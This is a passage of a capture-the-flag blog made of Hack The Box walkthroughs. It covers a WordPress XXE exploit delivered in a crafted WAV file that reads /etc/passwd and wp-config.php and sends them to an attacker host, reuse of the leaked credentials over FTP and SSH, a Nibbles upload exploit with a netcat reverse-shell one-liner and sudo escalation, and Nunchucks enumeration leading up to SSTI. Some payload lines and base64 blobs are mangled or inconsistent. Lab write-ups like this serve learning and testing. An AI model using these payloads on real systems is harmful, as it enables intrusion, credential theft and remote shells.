                        echo -en 'RIFF\\xb8\\x00\\x00\\x00WAVEiXML\\x7b\\x00\\x00\\x00<?xml version=\"1.0\"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '\"'\"'http://10.10.14.33:1234/xxe.dtd'\"'\"'>%remote;%init;%trick;]>\\x00' > payload.wav\n

                        And my xxe.dtd file if I want to get the /etc/password file:

                        <<!ENTITY % file SYSTEM \"php://filter/zlib.deflate/read=convert.base64-encode/resource=/etc/passwd\">\n<!ENTITY % init \"<!ENTITY &#x25; trick SYSTEM 'http://10.10.14.33:1234/?p=%file;'>\" >\n

                        Now, in the same folder where we have saved xxe.dtd, run a php server. In my case:

                        php -S 10.10.14.33:1234\n

                        Now we are ready to upload payload.wav in http://metapress.htb/wp-admin/upload.php. After we do, in the command line from we were serving our xxe.dtd file, we can read:

                        10.10.11.186:39962 [404]: GET /?p=jVRNj5swEL3nV3BspUSGkGSDj22lXjaVuum9MuAFusamNiShv74zY8gmgu5WHtB8vHkezxisMS2/8BCWRZX5d1pplgpXLnIha6MBEcEaDNY5yxxAXjWmjTJFpRfovfA1LIrPg1zvABTDQo3l8jQL0hmgNny33cYbTiYbSRmai0LUEpm2fBdybxDPjXpHWQssbsejNUeVnYRlmchKycic4FUD8AdYoBDYNcYoppp8lrxSAN/DIpUSvDbBannGuhNYpN6Qe3uS0XUZFhOFKGTc5Hh7ktNYc+kxKUbx1j8mcj6fV7loBY4lRrk6aBuw5mYtspcOq4LxgAwmJXh97iCqcnjh4j3KAdpT6SJ4BGdwEFoU0noCgk2zK4t3Ik5QQIc52E4zr03AhRYttnkToXxFK/jUFasn2Rjb4r7H3rWyDj6IvK70x3HnlPnMmbmZ1OTYUn8n/XtwAkjLC5Qt9VzlP0XT0gDDIe29BEe15Sst27OxL5QLH2G45kMk+OYjQ+NqoFkul74jA+QNWiudUSdJtGt44ivtk4/Y/yCDz8zB1mnniAfuWZi8fzBX5gTfXDtBu6B7iv6lpXL+DxSGoX8NPiqwNLVkI+j1vzUes62gRv8nSZKEnvGcPyAEN0BnpTW6+iPaChneaFlmrMy7uiGuPT0j12cIBV8ghvd3rlG9+63oDFseRRE/9Mfvj8FR2rHPdy3DzGehnMRP+LltfLt2d+0aI9O9wE34hyve2RND7xT7Fw== - No such file or directory   \n

                        We will use PHP to decode this. Create a .php with the following code, just be sure to copy and paste the base64 returned from the WordPress server where we have 'base64here' in the example code:

                        <?php echo zlib_decode(base64_decode('base64here')); ?>\n

                        In my case, I will call the file code.php, and it will have the following php content:

                        <?php echo zlib_decode(base64_decode('jVRNj5swEL3nV3BspUSGkGSDj22lXjaVuum9MuAFusamNiShv74zY8gmgu5WHtB8vHkezxisMS2/8BCWRZX5d1pplgpXLnIha6MBEcEaDNY5yxxAXjWmjTJFpRfovfA1LIrPg1zvABTDQo3l8jQL0hmgNny33cYbTiYbSRmai0LUEpm2fBdybxDPjXpHWQssbsejNUeVnYRlmchKycic4FUD8AdYoBDYNcYoppp8lrxSAN/DIpUSvDbBannGuhNYpN6Qe3uS0XUZFhOFKGTc5Hh7ktNYc+kxKUbx1j8mcj6fV7loBY4lRrk6aBuw5mYtspcOq4LxgAwmJXh97iCqcnjh4j3KAdpT6SJ4BGdwEFoU0noCgk2zK4t3Ik5QQIc52E4zr03AhRYttnkToXxFK/jUFasn2Rjb4r7H3rWyDj6IvK70x3HnlPnMmbmZ1OTYUn8n/XtwAkjLC5Qt9VzlP0XT0gDDIe29BEe15Sst27OxL5QLH2G45kMk+OYjQ+NqoFkul74jA+QNWiudUSdJtGt44ivtk4/Y/yCDz8zB1mnniAfuWZi8fzBX5gTfXDtBu6B7iv6lpXL+DxSGoX8NPiqwNLVkI+j1vzUes62gRv8nSZKEnvGcPyAEN0BnpTW6+iPaChneaFlmrMy7uiGuPT0j12cIBV8ghvd3rlG9+63oDFseRRE/9Mfvj8FR2rHPdy3DzGehnMRP+LltfLt2d+0aI9O9wE34hyve2RND7xT7Fw=='); ?>\n

                        Give executable permission to th file code.php and execute it:

                        chmod +x code.php\nphp code.php\n

                        Results:

                        root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\nirc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n_apt:x:100:65534::/nonexistent:/usr/sbin/nologin\nsystemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin\nsystemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin\nmessagebus:x:103:109::/nonexistent:/usr/sbin/nologin\nsshd:x:104:65534::/run/sshd:/usr/sbin/nologin\njnelson:x:1000:1000:jnelson,,,:/home/jnelson:/bin/bash\nsystemd-timesync:x:999:999:systemd Time Synchronization:/:/usr/sbin/nologin\nsystemd-coredump:x:998:998:systemd Core Dumper:/:/usr/sbin/nologin\nmysql:x:105:111:MySQL Server,,,:/nonexistent:/bin/false\nproftpd:x:106:65534::/run/proftpd:/usr/sbin/nologin\nftp:x:107:65534::/srv/ftp:/usr/sbin/nologin\n

                        Users with access to the bash terminal would be: root and jnelson. Noted!

                        To request different content to the WordPress server, we only need to modify our xxe.dtd file and instead of \"/etc/passwd\", use a different path. Common files to check out are:

                        • username/.ssh/id_rsa.pub: with this, we could try to login into the ssh server.
                        • /etc/shadow: to extract hashes.
                        • In a WordPress server: wp-config.php: inhere you could find some credentials.
                        • Logs and more...

                        Let's start with wp-config.php. We know from previous scans that the WordPress installation is running on a nginx server. Also, we know that wp-cofig.php file is always located at the root of the WordPress installation. Reading at the documentation, we can see that nginx server has a file that displays the enabled sites and provides an absolute path to them. That file is \"/etc/nginx/sites-enabled/default\". So, with that in mind, we can craft our xxe-nginx.dtd file with this content:

                        <!ENTITY % file SYSTEM \"php://filter/zlib.deflate/read=convert.base64-encode/resource=/etc/nginx/sites-enabled/default\">\n<!ENTITY % init \"<!ENTITY &#x25; trick SYSTEM 'http://10.10.14.33:1234/?p=%file;'>\" >\n

                        And for our payload-nginx.wav, we run:

                        echo -en 'RIFF\\xb8\\x00\\x00\\x00WAVEiXML\\x7b\\x00\\x00\\x00<?xml version=\"1.0\"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '\"'\"'http://10.10.14.33:1234/xxe-nginx.dtd'\"'\"'>%remote;%init;%trick;]>\\x00' > payload.wav\n

                        Now, we start our php server:

                        php -S 10.10.14.33:1234\n

                        After uploading payload-nginx-wav from http://metapress.htb/wp-admin/upload.php, our php server will display:

                        10.10.11.186:45010 [404]: GET /?p=XVHbbsMgDH1OvsKr8tBOauhjlWrah+wSUQrEXQIIkaMLHN8zjGQ9Cfp4SfPsxYpSAPbze5Wv1XVR5UaeeatDcBO3LNhGFgnA3deEpVN2LN9a3XCoDnIEeazdI27Vk3o2ngL10AFy6IJwdWNTfwEF4OHoOET0iTFXswsLsNnNMiVvCA1gCLTFkW/HetsJUERe9xPhiwm8vXgntNcefzTHI3/gvvCVDMLGhE2x8kkEHnZCCmOAWhcR0J4Le4FjNL+Z7wyIs5bbcrJXrSrLia9a813uOgssjTYJockZPR5dS6kmjmlDYiU56dbEjR4dxfej4mITjB9TGhlrZ3hzAKnXhPud/ - or directory\n

                        With this code, we craft the file code-nginx.php and give it execution permissions:

                        nano code-nginx.php\n

                        The content of the file will be:

                        <?php echo zlib_decode(base64_decode('XVHbbsMgDH1OvsKr8tBOauhjlWrah+wSUQrEXQIIkybT0n37IK2qrpaMLHN8zjGQ9Cfp4SfPsxYpSAPbze5Wv1XVR5UaeeatDcBO3LNhGFgnA3deEpVN2LN9a3XCoDnIEeazdI27Vk3o2ngL10AFy6IJwdWNpQBPL7D4x7ZYRTfwEF4OHoOET0iTFXswsLsNnNMiVvCA1gCLTFkW/HetsJUERe9xPhiwm8vXgntNcefzTHI3/gvvCVDMLGhE2x8kkEHnZCCmOAWhcR0RpbBGRYbs2qsdJ4Le4FjNL+Z7wyIs5bbcrJXrSrLia9a813uOgssjTYJockZPR5dS6kmjmlDYiU56dbEjR4dxfej4mITjB9TGhlrZ3hzAKnXhPud/')); ?>\n

                        Then we run:

                        php code-nginx.php\n

                        Results:

                        server {\n\n        listen 80;\n        listen [::]:80;\n\n        root /var/www/metapress.htb/blog;\n\n        index index.php index.html;\n\n        if ($http_host != \"metapress.htb\") {\n                rewrite ^ http://metapress.htb/;\n        }\n\n        location / {\n                try_files $uri $uri/ /index.php?$args;\n        }\n\n        location ~ \\.php$ {\n                include snippets/fastcgi-php.conf;\n                fastcgi_pass unix:/var/run/php/php8.0-fpm.sock;\n        }\n\n        location ~* \\.(js|css|png|jpg|jpeg|gif|ico|svg)$ {\n                expires max;\n                log_not_found off;\n        }\n\n}\n

                        Nice, now we know that root is set to \"/var/www/metapress.htb/blog\" (line 6 of the code). With this, we also know wp-config.php file's location (/var/www/metapress.htb/blog/wp-config.php.

                        Following previous steps, now we need to craft:

                        • payload-wpconfig.wav file: to upload it to http://metapress.htb/wp-admin/upload.php.
                        • xxe-wpconfig.dtd file: that we will serve with a php server.

                        Let's craft xxe-wpconfig.dtd:

                        NTITY % file SYSTEM \"php://filter/zlib.deflate/read=convert.base64-encode/resource=/var/www/metapress.htb/blog/wp-config.php\">\n<!ENTITY % init \"<!ENTITY &#x25; trick SYSTEM 'http://10.10.14.33:1234/?p=%file;'>\" >\n

                        Now, craft the payload-wpconfig.wav file:

                        echo -en 'RIFF\\xb8\\x00\\x00\\x00WAVEiXML\\x7b\\x00\\x00\\x00<?xml version=\"1.0\"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '\"'\"'http://10.10.14.33:1234/xxe-wpconfig.dtd'\"'\"'>%remote;%init;%trick;]>\\x00' > payload-wpconfig.wav\n

                        Launch the php server from the folder where we want to share the file xxe-wpconfig.dtd:

                        php -S 10.10.14.33:1234\n

                        After uploading our payload-wpconfig.wav file from http://metapress.htb/wp-admin/upload.php, we can read from the command line from where we launched the php server:

                        10.10.11.186:57388 [404]: GET /?p=jVVZU/JKEH2+VvkfhhKMoARUQBARAoRNIEDCpgUhIRMSzEYyYVP87TdBBD71LvAANdNzTs/p6dMPaUMyTk9CgQBgJAg0ToVAFwFy/gsc4njOgkDUTdDVTaFhQssCgdDpiQBFWYMXAMtn2TpRI7ErgPGKPsGAP3l68glXW9HN6gHEtqC5Rf9+vk2Trf9x3uAsa+Ek8eN8g6DpLtXKuxix2ygxyzDCzMwteoX28088SbfQr2mUKJpxIRR9zClu1PHZ/FcWOYkzLYgA0t0LAVkDYxNySNYmh0ydHwVa+A+GXIlo0eSWxEZiXOUjxxSu+gcaXVE45ECtDIiDvK5hCIwlTps4S5JsAVl0qQXd5tEvPFS1SjDbmnwR7LcLNFsjmRK1VUtEBlzu7nmIYBr7kqgQcYZbdFxC/C9xrvRuXKLep1lZzhRWVdaI1m7q88ov0V8KO7T4fyFnCXr/qEK/7NN01dkWOcURa6/hWeby9AQEAGE7z1dD8tgpjK6BtibPbAie4MoCnCYAmlOQhW8jM5asjSG4wWN42F04VpJoMyX2iew7PF8fLO159tpFKkDElhQZXV4ZC9iIyIF1Uh2948/3vYy/2WoWeq+51kq524zMXqeYugXa4+WtmsazoftvN6HJXLtFssdM2NIre/18eMBfj20jGbkb9Ts2F6qUZr5AvE3EJoMwv9DJ7n3imnxOSAOzq3RmvnIzFjPEt9SA832jqFLFIplny/XDVbDKpbrMcY3I+mGCxxpDNFrL80dB2JCk7IvEfRWtNRve1KYFWUba2bl2WerNB+/v5GXhI/c2e+qtvlHUqXqO/FMpjFZh3vR6qfBUTg4Tg8Doo1iHHqOXyc+7fERNkEIqL1zgZnD2NlxfFNL+O3VZb08S8RhqUndU9BvFViGaqDJHFC9JJjsZh65qZ34hKr6UAmgSDcsik36e49HuMjVSMnNvcF4KPHzchwfWRng4ryXxq2V4/dF6vPXk/6UWOybscdQhrJinmIhGhYqV9lKRtTrCm0lOnXaHdsV8Za+DQvmCnrYooftCn3/oqlwaTju59E2wnC7j/1iL/VWwyItID289KV+6VNaNmvE66fP6Kh6cKkN5UFts+kD4qKfOhxWrPKr5CxWmQnbKflA/q1OyUBZTv9biD6Uw3Gqf55qZckuRAJWMcpbSvyzM4s2uBOn6Uoh14Nlm4cnOrqRNJzF9ol+ZojX39SPR60K8muKrRy61bZrDKNj7FeNaHnAaWpSX+K6RvFsfZD8XQQpgC4PF/gAqOHNFgHOo6AY0rfsjYAHy9mTiuqqqC3DXq4qsvQIJIcO6D4XcUfBpILo5CVm2YegmCnGm0/UKDO3PB2UtuA8NfW/xboPNk9l28aeVAIK3dMVG7txBkmv37kQ8SlA24Rjp5urTfh0/vgAe8AksuA82SzcIpuRI53zfTk/+Ojzl3c4VYNl8ucWyAAfYzuI2X+w0RBawjSPCuTN3tu7lGJZiC1AAoryfMiac2U5CrO6a2Y7AhV0YQWdYudPJwp0x76r/Nw== - No such file or directory\n

                        With this, prepare the php file code-wpconfig.php to execute and extract the content. The content of the code-wpconfig.php file would be:

                        <?php echo zlib_decode(base64_decode('jVVZU/JKEH2+VvkfhhKMoARUQBARAoRNIEDCpgUhIRMSzEYyYVP87TdBBD71LvAANdNzTs/p6dMPaUMyTk9CgQBgJAg0ToVAFwFy/gsc4njOgkDUTdDVTaFhQssCgdDpiQBFWYMXAMtn2TpRI7ErgPGKPsGAP3l68glXW9HN6gHEtqC5Rf9+vk2Trf9x3uAsa+Ek8eN8g6DpLtXKuxix2ygxyzDCzMwteoX28088SbfQr2mUKJpxIRR9zClu1PHZ/FcWOYkzLYgA0t0LAVkDYxNySNYmh0ydHwVa+A+GXIlo0eSWxEZiXOUjxxSu+gcaXVE45ECtDIiDvK5hCIwlTps4S5JsAVl0qQXd5tEvPFS1SjDbmnwR7LcLNFsjmRK1VUtEBlzu7nmIYBr7kqgQcYZbdFxC/C9xrvRuXKLep1lZzhRWVdaI1m7q88ov0V8KO7T4fyFnCXr/qEK/7NN01dkWOcURa6/hWeby9AQEAGE7z1dD8tgpjK6BtibPbAie4MoCnCYAmlOQhW8jM5asjSG4wWN42F04VpJoMyX2iew7PF8fLO159tpFKkDElhQZXV4ZC9iIyIF1Uh2948/3vYy/2WoWeq+51kq524zMXqeYugXa4+WtmsazoftvN6HJXLtFssdM2NIre/18eMBfj20jGbkb9Ts2F6qUZr5AvE3EJoMwv9DJ7n3imnxOSAOzq3RmvnIzFjPEt9SA832jqFLFIplny/XDVbDKpbrMcY3I+mGCxxpDNFrL80dB2JCk7IvEfRWtNRve1KYFWUba2bl2WerNB+/v5GXhI/c2e+qtvlHUqXqO/FMpjFZh3vR6qfBUTg4Tg8Doo1iHHqOXyc+7fERNkEIqL1zgZnD2NlxfFNL+O3VZb08S8RhqUndU9BvFViGaqDJHFC9JJjsZh65qZ34hKr6UAmgSDcsik36e49HuMjVSMnNvcF4KPHzchwfWRng4ryXxq2V4/dF6vPXk/6UWOybscdQhrJinmIhGhYqV9lKRtTrCm0lOnXaHdsV8Za+DQvmCnrYooftCn3/oqlwaTju59E2wnC7j/1iL/VWwyItID289KV+6VNaNmvE66fP6Kh6cKkN5UFts+kD4qKfOhxWrPKr5CxWmQnbKflA/q1OyUBZTv9biD6Uw3Gqf55qZckuRAJWMcpbSvyzM4s2uBOn6Uoh14Nlm4cnOrqRNJzF9ol+ZojX39SPR60K8muKrRy61bZrDKNj7FeNaHnAaWpSX+K6RvFsfZD8XQQpgC4PF/gAqOHNFgHOo6AY0rfsjYAHy9mTiuqqqC3DXq4qsvQIJIcO6D4XcUfBpILo5CVm2YegmCnGm0/UKDO3PB2UtuA8NfW/xboPNk9l28aeVAIK3dMVG7txBkmv37kQ8SlA24Rjp5urTfh0/vgAe8AksuA82SzcIpuRI53zfTk/+Ojzl3c4VYNl8ucWyAAfYzuI2X+w0RBawjSPCuTN3tu7lGJZiC1AAoryfMiac2U5CrO6a2Y7AhV0YQWdYudPJwp0x76r/Nw==')); ?>\n

                        Run:

                        php code-wpconfig.php\n

                        Results are the content of the wp-config.php file of the wordpress installation:

                        <?php\n/** The name of the database for WordPress */\ndefine( 'DB_NAME', 'blog' );\n\n/** MySQL database username */\ndefine( 'DB_USER', 'blog' );\n\n/** MySQL database password */\ndefine( 'DB_PASSWORD', '635Aq@TdqrCwXFUZ' );\n\n/** MySQL hostname */\ndefine( 'DB_HOST', 'localhost' );\n\n/** Database Charset to use in creating database tables. */\ndefine( 'DB_CHARSET', 'utf8mb4' );\n\n/** The Database Collate type. Don't change this if in doubt. */\ndefine( 'DB_COLLATE', '' );\n\ndefine( 'FS_METHOD', 'ftpext' );\ndefine( 'FTP_USER', 'metapress.htb' );\ndefine( 'FTP_PASS', '9NYS_ii@FyL_p5M2NvJ' );\ndefine( 'FTP_HOST', 'ftp.metapress.htb' );\ndefine( 'FTP_BASE', 'blog/' );\ndefine( 'FTP_SSL', false );\n\n/**#@+\n * Authentication Unique Keys and Salts.\n * @since 2.6.0\n */\ndefine( 'AUTH_KEY',         '?!Z$uGO*A6xOE5x,pweP4i*z;m`|.Z:X@)QRQFXkCRyl7}`rXVG=3 n>+3m?.B/:' );\ndefine( 'SECURE_AUTH_KEY',  'x$i$)b0]b1cup;47`YVua/JHq%*8UA6g]0bwoEW:91EZ9h]rWlVq%IQ66pf{=]a%' );\ndefine( 'LOGGED_IN_KEY',    'J+mxCaP4z<g.6P^t`ziv>dd}EEi%48%JnRq^2MjFiitn#&n+HXv]||E+F~C{qKXy' );\ndefine( 'NONCE_KEY',        'SmeDr$$O0ji;^9]*`~GNe!pX@DvWb4m9Ed=Dd(.r-q{^z(F?)7mxNUg986tQO7O5' );\ndefine( 'AUTH_SALT',        '[;TBgc/,M#)d5f[H*tg50ifT?Zv.5Wx=`l@v$-vH*<~:0]s}d<&M;.,x0z~R>3!D' );\ndefine( 'SECURE_AUTH_SALT', '>`VAs6!G955dJs?$O4zm`.Q;amjW^uJrk_1-dI(SjROdW[S&~omiH^jVC?2-I?I.' );\ndefine( 'LOGGED_IN_SALT',   '4[fS^3!=%?HIopMpkgYboy8-jl^i]Mw}Y d~N=&^JsI`M)FJTJEVI) N#NOidIf=' );\ndefine( 'NONCE_SALT',       '.sU&CQ@IRlh O;5aslY+Fq8QWheSNxd6Ve#}w!Bq,h}V9jKSkTGsv%Y451F8L=bL' );\n\n/**\n * WordPress Database Table prefix.\n */\n$table_prefix = 'wp_';\n\n/**\n * For developers: WordPress debugging mode.\n * @link https://wordpress.org/support/article/debugging-in-wordpress/\n */\ndefine( 'WP_DEBUG', false );\n\n/** Absolute path to the WordPress directory. */\nif ( ! defined( 'ABSPATH' ) ) {\n        define( 'ABSPATH', __DIR__ . '/' );\n}\n\n/** Sets up WordPress vars and included files. */\nrequire_once ABSPATH . 'wp-settings.php';\n

                        Some lines are different from the regular wp-config.php file of a Wordpress installation. They also provide credentials to access an ftp server:

                        define( 'FS_METHOD', 'ftpext' );\ndefine( 'FTP_USER', 'metapress.htb' );\ndefine( 'FTP_PASS', '9NYS_ii@FyL_p5M2NvJ' );\ndefine( 'FTP_HOST', 'ftp.metapress.htb' );\ndefine( 'FTP_BASE', 'blog/' );\ndefine( 'FTP_SSL', false );\n

                        So... let's connect us to the ftp server:

                        ftp 10.10.11.186\n\n# After this we will be asked for out username and password.\n# Enter username: metapress.htb\n# Enter password: 9NYS_ii@FyL_p5M2NvJ\n

                        We can access two folders in the ftp server: blog and mailer. After browsing and inspecting the files, there is one that catches my attention: /mailer/sent_email.php. To get the file, run from the ftp server command line:

                        mget send_email.php\n

                        From our attacking machine we can see the content of that file:

                        cat send_email.php\n

                        Results:

                        <?php\n/*\n * This script will be used to send an email to all our users when ready for launch\n*/\n\nuse PHPMailer\\PHPMailer\\PHPMailer;\nuse PHPMailer\\PHPMailer\\SMTP;\nuse PHPMailer\\PHPMailer\\Exception;\n\nrequire 'PHPMailer/src/Exception.php';\nrequire 'PHPMailer/src/PHPMailer.php';\nrequire 'PHPMailer/src/SMTP.php';\n\n$mail = new PHPMailer(true);\n\n$mail->SMTPDebug = 3;                               \n$mail->isSMTP();            \n\n$mail->Host = \"mail.metapress.htb\";\n$mail->SMTPAuth = true;                          \n$mail->Username = \"jnelson@metapress.htb\";                 \n$mail->Password = \"Cb4_JmWM8zUZWMu@Ys\";                           \n$mail->SMTPSecure = \"tls\";                           \n$mail->Port = 587;                                   \n\n$mail->From = \"jnelson@metapress.htb\";\n$mail->FromName = \"James Nelson\";\n\n$mail->addAddress(\"info@metapress.htb\");\n\n$mail->isHTML(true);\n\n$mail->Subject = \"Startup\";\n$mail->Body = \"<i>We just started our new blog metapress.htb!</i>\";\n\ntry {\n    $mail->send();\n    echo \"Message has been sent successfully\";\n} catch (Exception $e) {\n    echo \"Mailer Error: \" . $mail->ErrorInfo;\n}\n

                        This script contains credentials of the user jnelson, that we had spotted before in the /etc/passwd file, but now we also have his password.

                        From the initial enumeration of ports and services in the Metatwo machine, we know that ssh service is running. We try to login in to that service:

                        # Quick install sshpass if you prefer to enter the ssh connection in one line.\n\nsudo apt install sshpass\nsshpass -p 'Cb4_JmWM8zUZWMu@Ys' ssh jnelson@10.10.11.186\n

                        Now, you are in jnelson terminal. To get the user's flag, run:

                        cat user.txt\n
                        ","tags":["walkthrough"]},{"location":"htb-metatwo/#getting-the-systems-flag","title":"Getting the System's flag","text":"

                        Coming soon.

                        ","tags":["walkthrough"]},{"location":"htb-metatwo/#some-other-write-ups-and-learning-material-related","title":"Some other write-ups and learning material related","text":"
                        • https://tryhackme.com/room/wordpresscve202129447
                        • Wpscan: CVE-2021-29447
                        • https://www.maketecheasier.com/pgp-encryption-how-it-works/
                        ","tags":["walkthrough"]},{"location":"htb-mongod/","title":"Walkthrough - A HackTheBox machine - Mongod","text":"

                        Enumerate open services/ports:

                        nmap -sC -sV $ip -Pn -p-\n

                        Ports 22 and 27017 are open.

                        mongo IP:port\n# in my case: mongo 10.129.228.30:27017 \n

                        Now, use mongodb cheat sheet to browse the databases:

                        show databases\nuse sensitive_information\nshow collections\ndb.flag.find()\n
                        ","tags":["walkthrough","mongodb","port 27017"]},{"location":"htb-nibbles/","title":"Nibbles - A HackTheBox machine","text":"

                        voy# Nibbles - A Hack The Box machine

                        nmap -sC -sV -Pn 10.129.96.84 \n

                        Results:

                        PORT   STATE SERVICE VERSION\n22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   2048 c4f8ade8f80477decf150d630a187e49 (RSA)\n|   256 228fb197bf0f1708fc7e2c8fe9773a48 (ECDSA)\n|_  256 e6ac27a3b5a9f1123c34a55d5beb3de9 (ED25519)\n80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))\n|_http-server-header: Apache/2.4.18 (Ubuntu)\n|_http-title: Site doesn't have a title (text/html).\nService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel\n

                        Visiting the IP:80 in the browser and reviewing source code there is a comment:

                        <!-- /nibbleblog/ directory. Nothing interesting here! -->\n

                        So, we have a website at http://10.129.96.84/nibbleblog/

                        Dirb enumeration reveals a login panel: http://10.129.96.84/nibbleblog/admin.php

                        dirb http://10.129.96.84/nibbleblog/ /usr/share/wordlists/dirb/common.txt\n

                        Too many login attempts too quickly trigger a lockout with the message \"Nibbleblog security error - Blacklist protection\".

                        Also, dirb enumeration reveals some directories that are listable. Browsing around we get to this file: http://10.129.96.84/nibbleblog/content/private/users.xml where user \"admin\" is exposed.

                        Also CMS version is disclosed in http://10.129.96.84/nibbleblog/README:

                        ====== Nibbleblog ======\nVersion: v4.0.3\nCodename: Coffee\nRelease date: 2014-04-01\n

                        A quick search for that version brings up this vulnerability:

                        https://github.com/dix0nym/CVE-2015-6967/blob/main/README.md

                        In the usage example we can read:

                        python3 exploit.py --url http://10.10.10.75/nibbleblog/ --username admin --password nibbles --payload shell.php\n

                        Default credentials are:

                        admin:nibbles\n

                        Also, reading the code of the exploit, we can see that the triggered endpoint for this CVE-2015-6967 is:

                        uploadURL = f\"{nibbleURL}admin.php?controller=plugins&action=config&plugin=my_image\"\n

                        Knowing this, we can login into the panel http://10.129.96.84/nibbleblog/admin.php and go to Plugins>My Image> Configure.

                        In the browser, upload a file. In my case, I uploaded my pentesmonkey.

                        Now, we need to find where this file has been saved to. After browsing around, I ended up in http://10.129.96.84/nibbleblog/content/private/plugins/my_image/

                        There there was a file called image.php. Before clicking on it, we open in our attacker machine a netcat listener:

                        nc -lnvp 1234\n

                        Click on the file image.php listed in http://10.129.96.84/nibbleblog/content/private/plugins/my_image/ and you will have a reverse shell.

                        Cat user.txt (under /home/nibbler).

                        ","tags":["walkthrough","reverse shell","CVE-2015-6967"]},{"location":"htb-nibbles/#privilege-escalation","title":"Privilege escalation","text":"
                        sudo -l\n

                        Results:

                        $ sudo -l\nMatching Defaults entries for nibbler on Nibbles:\n    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin\n\nUser nibbler may run the following commands on Nibbles:\n    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh\n

                        At /home/nibbler, unzip the file personal.zip. Now you can even replace monitor.sh for a different monitor.sh. Mine has:

                        /bin/bash\n

                        Now run:

                        sudo -u root .home/nibbler/personal/stuff/monitor.sh\n

                        And you are root. Remember to do a chmod if needed.

                        ","tags":["walkthrough","reverse shell","CVE-2015-6967"]},{"location":"htb-nibbles/#some-input-from-htb-walkthrough","title":"Some input from HTB walkthrough","text":"

                        You can run nmap script for nibbles service:

                        nmap -sC -p 22,80 -oA nibbles_script_scan 10.129.42.190\n

                        For privilege escalation:

                        echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 8443 >/tmp/f' | tee -a monitor.sh\n

                        Alternative way:

                        msf6 > search nibbleblog\n\nmsf6 > use exploit/multi/http/nibbleblog_file_upload\n\nmsf6 exploit(multi/http/nibbleblog_file_upload) > set rhosts 10.129.42.190\nrhosts => 10.129.42.190\nmsf6 exploit(multi/http/nibbleblog_file_upload) > set lhost 10.10.14.2 \nlhost => 10.10.14.2\n

                        We need to set the admin username and password admin:nibbles and the TARGETURI to nibbleblog.

                        ","tags":["walkthrough","reverse shell","CVE-2015-6967"]},{"location":"htb-nunchucks/","title":"Nunchucks - A Hack The Box machine","text":"","tags":["walkthrough"]},{"location":"htb-nunchucks/#users-flag","title":"User's flag","text":"","tags":["walkthrough"]},{"location":"htb-nunchucks/#enumeration","title":"Enumeration","text":"
                        nmap -sC -sV 10.129.95.252 -Pn\n

                        Open ports: 22, 80, and 443.

                        Also http://nunchucks.htb is in results.

                        Adding IP and domain nunchucks.htb to /etc/hosts.

                        whatweb http://nunchucks.htb \n

                        And some directory enumeration:

                        feroxbuster -u https://nunchucks.htb -k\n

                        Results:

                        200      GET      250l     1863w    19134c https://nunchucks.htb/Privacy\n200      GET      245l     1737w    17753c https://nunchucks.htb/Terms\n200      GET      183l      662w     9172c https://nunchucks.htb/login\n200      GET      187l      683w     9488c https://nunchucks.htb/signup\n

                        Trying to login into the application or signing up returns the following response message:

                        {\"response\":\"We're sorry but user logins are currently disabled.\"}\n\n{\"response\":\"We're sorry but registration is currently closed.\"}\n

                        Now, we will try some subdomain enumeration

                        wfuzz -c --hc 404 -t 200 -u https://nunchucks.htb/ -w /usr/share/dirb/wordlists/common.txt -H \"Host: FUZZ.nunchucks.htb\" --hl 546\n# -c: Color in output\n# \u2013hc 404: Hide 404 code responses\n# -t 200: Concurrent Threads\n# -u http://nunchucks.htb/: Target URL\n# -w /usr/share/dirb/wordlists/common.txt: Wordlist \n# -H \u201cHost: FUZZ.nunchucks.htb\u201d: Header. Also with \"FUZZ\" we indicate the injection point for payloads\n# \u2013hl 546: Filter out responses with a specific number of lines. In this case, 546\n

                        Results: store

                        We will add store.nunchucks.htb to /etc/hosts file.

                        ","tags":["walkthrough"]},{"location":"htb-nunchucks/#exploitation","title":"Exploitation","text":"

                        Browsing https://store.nunchucks.htb is a simple landing page to collect emails. There is a form for this purpose. After fuzzing it with Burpsuite we find this interesting output:

                        Some code can get executed in that field. This vulnerability is known as Server-side Template Injection (SSTI)

                        Once we have an injection endpoint, it's important to identify the application server and template engine running on it, since payloads and exploitation pretty much depends on it.

                        From headers response we have: \"X-Powered-By: Express\".

                        Having a look at template engines in Express at https://expressjs.com/en/resources/template-engines.html, there exists a Nunjucks, which is close the domain name nunchucks.

                        This blog post describe how we can exploit this vulnerability: http://disse.cting.org/2016/08/02/2016-08-02-sandbox-break-out-nunjucks-template-engine

                        Basically, I'm using the following payloads:

